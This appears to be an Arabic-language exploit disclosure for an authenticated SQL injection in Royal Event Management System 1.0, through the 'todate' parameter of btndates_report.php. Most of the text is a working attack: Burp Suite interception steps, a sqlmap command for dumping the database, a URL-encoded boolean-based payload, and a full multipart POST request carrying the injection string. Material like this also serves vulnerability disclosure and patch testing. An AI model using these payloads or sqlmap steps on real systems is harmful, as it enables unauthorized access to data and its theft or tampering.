
استغلال حقن SQL مُصادق عليه لنظام إدارة الفعاليات الملكية (Royal Event Management System) الإصدار 1.0 عبر معامل 'todate'، مع حمولات إثبات المفهوم وتكامل SQLmap لاستخراج قاعدة البيانات.
نظام إدارة الفعاليات الملكي الإصدار 1.0 يسمح بحقن SQL عبر المعامل 'todate' في /royal_event/btndates_report.php#?= استغلال هذه الثغرة يمكن أن يسمح للمهاجم باختراق التطبيق، أو الوصول إلى البيانات أو تعديلها، أو استغلال نقاط ضعف كامنة في قاعدة البيانات الأساسية.
في Burpsuite اعترض الطلب من الصفحة المتأثرة باستخدام المعامل 'todate' واحفظه كـ poc.txt. ثم قم بتشغيل SQLmap لاستخراج البيانات من قاعدة البيانات:
sqlmap -r poc.txt --dbms=mysql
(boolean-based)
-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns
POST /royal_event/btndates_report.php#?= HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 334
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
Referer: http://localhost/royal_event/btndates_report.php#?=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="todate"
-1' OR 1=1 OR 'ns'='ns
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="search"
3
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="fromdate"
01/01/2011
--f289a6438bcc45179bcd3eb7ddc555d0--